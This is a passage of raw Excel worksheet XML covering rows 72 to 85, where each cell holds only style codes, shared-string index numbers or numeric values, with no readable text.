      <c r="Y72" s="52" t="s">
        <v>621</v>
      </c>
      <c r="Z72" s="52">
        <v>3.0</v>
      </c>
      <c r="AA72" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB72" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC72" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD72" s="65" t="s">
        <v>622</v>
      </c>
      <c r="AE72" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF72" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG72" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH72" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI72" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ72" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK72" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL72" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="73" ht="153.75" customHeight="1">
      <c r="B73" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C73" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D73" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E73" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F73" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G73" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H73" s="46" t="s">
        <v>608</v>
      </c>
      <c r="I73" s="46" t="s">
        <v>623</v>
      </c>
      <c r="J73" s="46" t="s">
        <v>624</v>
      </c>
      <c r="K73" s="47">
        <v>1.0</v>
      </c>
      <c r="L73" s="47">
        <v>0.0</v>
      </c>
      <c r="M73" s="48">
        <v>402.0</v>
      </c>
      <c r="N73" s="48">
        <v>1.0</v>
      </c>
      <c r="O73" s="48">
        <v>15.0</v>
      </c>
      <c r="P73" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q73" s="50">
        <v>402.0</v>
      </c>
      <c r="R73" s="50">
        <v>1.0</v>
      </c>
      <c r="S73" s="50">
        <v>15.0</v>
      </c>
      <c r="T73" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U73" s="51">
        <v>402.0</v>
      </c>
      <c r="V73" s="51">
        <v>1.0</v>
      </c>
      <c r="W73" s="51">
        <v>30.0</v>
      </c>
      <c r="X73" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y73" s="52" t="s">
        <v>625</v>
      </c>
      <c r="Z73" s="52">
        <v>5.0</v>
      </c>
      <c r="AA73" s="52">
        <v>60221.0</v>
      </c>
      <c r="AB73" s="49" t="s">
        <v>626</v>
      </c>
      <c r="AC73" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD73" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE73" s="65" t="s">
        <v>627</v>
      </c>
      <c r="AF73" s="53" t="s">
        <v>628</v>
      </c>
      <c r="AG73" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH73" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI73" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ73" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK73" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL73" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="74" ht="153.75" customHeight="1">
      <c r="B74" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C74" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D74" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E74" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F74" s="55" t="s">
        <v>629</v>
      </c>
      <c r="G74" s="45" t="s">
        <v>630</v>
      </c>
      <c r="H74" s="46" t="s">
        <v>631</v>
      </c>
      <c r="I74" s="46" t="s">
        <v>632</v>
      </c>
      <c r="J74" s="46" t="s">
        <v>633</v>
      </c>
      <c r="K74" s="47">
        <v>1.0</v>
      </c>
      <c r="L74" s="47">
        <v>0.0</v>
      </c>
      <c r="M74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P74" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q74" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R74" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S74" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T74" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U74" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V74" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W74" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X74" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y74" s="52" t="s">
        <v>634</v>
      </c>
      <c r="Z74" s="52">
        <v>4.0</v>
      </c>
      <c r="AA74" s="52">
        <v>698.0</v>
      </c>
      <c r="AB74" s="49" t="s">
        <v>626</v>
      </c>
      <c r="AC74" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD74" s="65" t="s">
        <v>635</v>
      </c>
      <c r="AE74" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF74" s="53" t="s">
        <v>636</v>
      </c>
      <c r="AG74" s="65" t="s">
        <v>637</v>
      </c>
      <c r="AH74" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI74" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ74" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK74" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL74" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="75" ht="153.75" customHeight="1">
      <c r="B75" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C75" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D75" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E75" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F75" s="55" t="s">
        <v>629</v>
      </c>
      <c r="G75" s="45" t="s">
        <v>630</v>
      </c>
      <c r="H75" s="46" t="s">
        <v>638</v>
      </c>
      <c r="I75" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J75" s="46" t="s">
        <v>639</v>
      </c>
      <c r="K75" s="47">
        <v>1.0</v>
      </c>
      <c r="L75" s="47">
        <v>0.0</v>
      </c>
      <c r="M75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P75" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q75" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R75" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S75" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T75" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U75" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V75" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W75" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X75" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y75" s="52" t="s">
        <v>640</v>
      </c>
      <c r="Z75" s="52">
        <v>3.0</v>
      </c>
      <c r="AA75" s="52">
        <v>16.0</v>
      </c>
      <c r="AB75" s="49" t="s">
        <v>626</v>
      </c>
      <c r="AC75" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD75" s="65" t="s">
        <v>641</v>
      </c>
      <c r="AE75" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF75" s="53" t="s">
        <v>642</v>
      </c>
      <c r="AG75" s="65" t="s">
        <v>643</v>
      </c>
      <c r="AH75" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI75" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ75" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK75" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL75" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="76" ht="153.75" customHeight="1">
      <c r="B76" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C76" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D76" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E76" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F76" s="55" t="s">
        <v>629</v>
      </c>
      <c r="G76" s="45" t="s">
        <v>630</v>
      </c>
      <c r="H76" s="46" t="s">
        <v>644</v>
      </c>
      <c r="I76" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J76" s="46" t="s">
        <v>645</v>
      </c>
      <c r="K76" s="47">
        <v>1.0</v>
      </c>
      <c r="L76" s="47">
        <v>0.0</v>
      </c>
      <c r="M76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P76" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q76" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R76" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S76" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T76" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U76" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V76" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W76" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X76" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y76" s="52" t="s">
        <v>646</v>
      </c>
      <c r="Z76" s="52">
        <v>5.0</v>
      </c>
      <c r="AA76" s="52">
        <v>1007.0</v>
      </c>
      <c r="AB76" s="49" t="s">
        <v>647</v>
      </c>
      <c r="AC76" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD76" s="65" t="s">
        <v>648</v>
      </c>
      <c r="AE76" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF76" s="53" t="s">
        <v>649</v>
      </c>
      <c r="AG76" s="65" t="s">
        <v>650</v>
      </c>
      <c r="AH76" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI76" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ76" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK76" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL76" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="77" ht="153.75" customHeight="1">
      <c r="B77" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C77" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D77" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E77" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F77" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G77" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H77" s="46" t="s">
        <v>651</v>
      </c>
      <c r="I77" s="46" t="s">
        <v>434</v>
      </c>
      <c r="J77" s="46" t="s">
        <v>652</v>
      </c>
      <c r="K77" s="47">
        <v>1.0</v>
      </c>
      <c r="L77" s="47">
        <v>0.0</v>
      </c>
      <c r="M77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q77" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R77" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S77" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U77" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V77" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W77" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y77" s="52" t="s">
        <v>10</v>
      </c>
      <c r="Z77" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA77" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC77" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD77" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE77" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF77" s="53" t="s">
        <v>653</v>
      </c>
      <c r="AG77" s="65" t="s">
        <v>654</v>
      </c>
      <c r="AH77" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI77" s="47" t="s">
        <v>361</v>
      </c>
      <c r="AJ77" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK77" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL77" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="78" ht="153.75" customHeight="1">
      <c r="B78" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C78" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D78" s="45" t="s">
        <v>655</v>
      </c>
      <c r="E78" s="45" t="s">
        <v>656</v>
      </c>
      <c r="F78" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G78" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H78" s="46" t="s">
        <v>657</v>
      </c>
      <c r="I78" s="46" t="s">
        <v>658</v>
      </c>
      <c r="J78" s="46" t="s">
        <v>659</v>
      </c>
      <c r="K78" s="47">
        <v>1.0</v>
      </c>
      <c r="L78" s="47">
        <v>0.0</v>
      </c>
      <c r="M78" s="48">
        <v>254.0</v>
      </c>
      <c r="N78" s="48">
        <v>1.0</v>
      </c>
      <c r="O78" s="48">
        <v>2.0</v>
      </c>
      <c r="P78" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q78" s="50">
        <v>254.0</v>
      </c>
      <c r="R78" s="50">
        <v>1.0</v>
      </c>
      <c r="S78" s="50">
        <v>2.0</v>
      </c>
      <c r="T78" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U78" s="51">
        <v>254.0</v>
      </c>
      <c r="V78" s="51">
        <v>1.0</v>
      </c>
      <c r="W78" s="51">
        <v>4.0</v>
      </c>
      <c r="X78" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y78" s="52" t="s">
        <v>660</v>
      </c>
      <c r="Z78" s="52">
        <v>3.0</v>
      </c>
      <c r="AA78" s="52">
        <v>10.0</v>
      </c>
      <c r="AB78" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC78" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD78" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE78" s="65" t="s">
        <v>661</v>
      </c>
      <c r="AF78" s="53" t="s">
        <v>662</v>
      </c>
      <c r="AG78" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH78" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI78" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ78" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK78" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL78" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="79" ht="153.75" customHeight="1">
      <c r="B79" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C79" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D79" s="45" t="s">
        <v>663</v>
      </c>
      <c r="E79" s="45" t="s">
        <v>664</v>
      </c>
      <c r="F79" s="55" t="s">
        <v>665</v>
      </c>
      <c r="G79" s="45" t="s">
        <v>666</v>
      </c>
      <c r="H79" s="46" t="s">
        <v>667</v>
      </c>
      <c r="I79" s="46" t="s">
        <v>503</v>
      </c>
      <c r="J79" s="46" t="s">
        <v>668</v>
      </c>
      <c r="K79" s="47">
        <v>1.0</v>
      </c>
      <c r="L79" s="47">
        <v>0.0</v>
      </c>
      <c r="M79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P79" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q79" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R79" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S79" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T79" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U79" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V79" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W79" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X79" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y79" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z79" s="52">
        <v>2.0</v>
      </c>
      <c r="AA79" s="52">
        <v>2.0</v>
      </c>
      <c r="AB79" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC79" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD79" s="65" t="s">
        <v>669</v>
      </c>
      <c r="AE79" s="101" t="s">
        <v>667</v>
      </c>
      <c r="AF79" s="53" t="s">
        <v>670</v>
      </c>
      <c r="AG79" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH79" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI79" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ79" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK79" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL79" s="102" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="80" ht="153.75" customHeight="1">
      <c r="B80" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C80" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D80" s="45" t="s">
        <v>671</v>
      </c>
      <c r="E80" s="45" t="s">
        <v>672</v>
      </c>
      <c r="F80" s="55" t="s">
        <v>673</v>
      </c>
      <c r="G80" s="45" t="s">
        <v>674</v>
      </c>
      <c r="H80" s="46" t="s">
        <v>675</v>
      </c>
      <c r="I80" s="46" t="s">
        <v>676</v>
      </c>
      <c r="J80" s="46" t="s">
        <v>677</v>
      </c>
      <c r="K80" s="47">
        <v>1.0</v>
      </c>
      <c r="L80" s="47">
        <v>0.0</v>
      </c>
      <c r="M80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P80" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q80" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R80" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S80" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T80" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U80" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V80" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W80" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X80" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y80" s="52" t="s">
        <v>251</v>
      </c>
      <c r="Z80" s="52">
        <v>3.0</v>
      </c>
      <c r="AA80" s="52">
        <v>7.0</v>
      </c>
      <c r="AB80" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC80" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD80" s="65" t="s">
        <v>678</v>
      </c>
      <c r="AE80" s="65" t="s">
        <v>679</v>
      </c>
      <c r="AF80" s="53" t="s">
        <v>680</v>
      </c>
      <c r="AG80" s="65" t="s">
        <v>681</v>
      </c>
      <c r="AH80" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI80" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ80" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK80" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL80" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="81" ht="153.75" customHeight="1">
      <c r="B81" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C81" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D81" s="45" t="s">
        <v>682</v>
      </c>
      <c r="E81" s="45" t="s">
        <v>683</v>
      </c>
      <c r="F81" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G81" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H81" s="46" t="s">
        <v>684</v>
      </c>
      <c r="I81" s="46" t="s">
        <v>685</v>
      </c>
      <c r="J81" s="46" t="s">
        <v>686</v>
      </c>
      <c r="K81" s="47">
        <v>1.0</v>
      </c>
      <c r="L81" s="47">
        <v>1.0</v>
      </c>
      <c r="M81" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N81" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O81" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P81" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q81" s="103" t="s">
        <v>687</v>
      </c>
      <c r="R81" s="50">
        <v>2.0</v>
      </c>
      <c r="S81" s="50">
        <v>2.0</v>
      </c>
      <c r="T81" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U81" s="104" t="s">
        <v>687</v>
      </c>
      <c r="V81" s="51">
        <v>2.0</v>
      </c>
      <c r="W81" s="51">
        <v>2.0</v>
      </c>
      <c r="X81" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y81" s="52" t="s">
        <v>688</v>
      </c>
      <c r="Z81" s="52">
        <v>4.0</v>
      </c>
      <c r="AA81" s="52">
        <v>4.0</v>
      </c>
      <c r="AB81" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC81" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD81" s="65" t="s">
        <v>689</v>
      </c>
      <c r="AE81" s="65" t="s">
        <v>679</v>
      </c>
      <c r="AF81" s="53" t="s">
        <v>690</v>
      </c>
      <c r="AG81" s="65" t="s">
        <v>691</v>
      </c>
      <c r="AH81" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI81" s="47" t="s">
        <v>692</v>
      </c>
      <c r="AJ81" s="47" t="s">
        <v>693</v>
      </c>
      <c r="AK81" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL81" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="82" ht="197.25" customHeight="1">
      <c r="B82" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C82" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D82" s="45" t="s">
        <v>694</v>
      </c>
      <c r="E82" s="45" t="s">
        <v>695</v>
      </c>
      <c r="F82" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G82" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H82" s="46" t="s">
        <v>696</v>
      </c>
      <c r="I82" s="46" t="s">
        <v>697</v>
      </c>
      <c r="J82" s="46" t="s">
        <v>698</v>
      </c>
      <c r="K82" s="47">
        <v>1.0</v>
      </c>
      <c r="L82" s="47">
        <v>0.0</v>
      </c>
      <c r="M82" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N82" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O82" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P82" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q82" s="59" t="s">
        <v>699</v>
      </c>
      <c r="R82" s="50">
        <v>3.0</v>
      </c>
      <c r="S82" s="50">
        <v>12.0</v>
      </c>
      <c r="T82" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U82" s="51" t="s">
        <v>700</v>
      </c>
      <c r="V82" s="51">
        <v>4.0</v>
      </c>
      <c r="W82" s="51">
        <v>13.0</v>
      </c>
      <c r="X82" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y82" s="52" t="s">
        <v>701</v>
      </c>
      <c r="Z82" s="52">
        <v>9.0</v>
      </c>
      <c r="AA82" s="52">
        <v>38.0</v>
      </c>
      <c r="AB82" s="49" t="s">
        <v>702</v>
      </c>
      <c r="AC82" s="64" t="s">
        <v>270</v>
      </c>
      <c r="AD82" s="65" t="s">
        <v>703</v>
      </c>
      <c r="AE82" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF82" s="53" t="s">
        <v>704</v>
      </c>
      <c r="AG82" s="65" t="s">
        <v>705</v>
      </c>
      <c r="AH82" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI82" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ82" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK82" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL82" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="83" ht="177.75" customHeight="1">
      <c r="B83" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C83" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D83" s="45" t="s">
        <v>706</v>
      </c>
      <c r="E83" s="45" t="s">
        <v>707</v>
      </c>
      <c r="F83" s="55" t="s">
        <v>708</v>
      </c>
      <c r="G83" s="45" t="s">
        <v>709</v>
      </c>
      <c r="H83" s="46" t="s">
        <v>710</v>
      </c>
      <c r="I83" s="46" t="s">
        <v>711</v>
      </c>
      <c r="J83" s="46" t="s">
        <v>712</v>
      </c>
      <c r="K83" s="47">
        <v>1.0</v>
      </c>
      <c r="L83" s="47">
        <v>1.0</v>
      </c>
      <c r="M83" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N83" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O83" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P83" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q83" s="103" t="s">
        <v>687</v>
      </c>
      <c r="R83" s="50">
        <v>2.0</v>
      </c>
      <c r="S83" s="50">
        <v>2.0</v>
      </c>
      <c r="T83" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U83" s="104" t="s">
        <v>687</v>
      </c>
      <c r="V83" s="51">
        <v>2.0</v>
      </c>
      <c r="W83" s="51">
        <v>2.0</v>
      </c>
      <c r="X83" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y83" s="52" t="s">
        <v>713</v>
      </c>
      <c r="Z83" s="52">
        <v>5.0</v>
      </c>
      <c r="AA83" s="52">
        <v>6.0</v>
      </c>
      <c r="AB83" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC83" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD83" s="65" t="s">
        <v>714</v>
      </c>
      <c r="AE83" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF83" s="53" t="s">
        <v>715</v>
      </c>
      <c r="AG83" s="65" t="s">
        <v>716</v>
      </c>
      <c r="AH83" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI83" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ83" s="47" t="s">
        <v>717</v>
      </c>
      <c r="AK83" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL83" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="84" ht="177.75" customHeight="1">
      <c r="B84" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C84" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D84" s="45" t="s">
        <v>718</v>
      </c>
      <c r="E84" s="45" t="s">
        <v>719</v>
      </c>
      <c r="F84" s="55" t="s">
        <v>720</v>
      </c>
      <c r="G84" s="45" t="s">
        <v>721</v>
      </c>
      <c r="H84" s="46" t="s">
        <v>722</v>
      </c>
      <c r="I84" s="46" t="s">
        <v>697</v>
      </c>
      <c r="J84" s="46" t="s">
        <v>723</v>
      </c>
      <c r="K84" s="47">
        <v>1.0</v>
      </c>
      <c r="L84" s="47">
        <v>1.0</v>
      </c>
      <c r="M84" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N84" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O84" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P84" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q84" s="103" t="s">
        <v>724</v>
      </c>
      <c r="R84" s="50">
        <v>3.0</v>
      </c>
      <c r="S84" s="50">
        <v>4.0</v>
      </c>
      <c r="T84" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U84" s="51" t="s">
        <v>725</v>
      </c>
      <c r="V84" s="51">
        <v>4.0</v>
      </c>
      <c r="W84" s="51">
        <v>24.0</v>
      </c>
      <c r="X84" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y84" s="52" t="s">
        <v>726</v>
      </c>
      <c r="Z84" s="52">
        <v>7.0</v>
      </c>
      <c r="AA84" s="52">
        <v>30.0</v>
      </c>
      <c r="AB84" s="49" t="s">
        <v>702</v>
      </c>
      <c r="AC84" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD84" s="65" t="s">
        <v>727</v>
      </c>
      <c r="AE84" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF84" s="53" t="s">
        <v>728</v>
      </c>
      <c r="AG84" s="65" t="s">
        <v>729</v>
      </c>
      <c r="AH84" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI84" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ84" s="47" t="s">
        <v>717</v>
      </c>
      <c r="AK84" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL84" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="85" ht="177.75" customHeight="1">
      <c r="B85" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C85" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D85" s="45" t="s">
        <v>730</v>
      </c>
      <c r="E85" s="45" t="s">
        <v>731</v>
      </c>
      <c r="F85" s="55" t="s">
        <v>732</v>
      </c>
      <c r="G85" s="45" t="s">
        <v>733</v>
      </c>
      <c r="H85" s="46" t="s">
        <v>734</v>
      </c>
      <c r="I85" s="46" t="s">
        <v>735</v>
      </c>
      <c r="J85" s="46" t="s">
        <v>736</v>
      </c>
      <c r="K85" s="47">
        <v>1.0</v>
      </c>
      <c r="L85" s="47">
        <v>0.0</v>
      </c>
      <c r="M85" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N85" s="48" t="s">
        <v>10</v>
      </c>
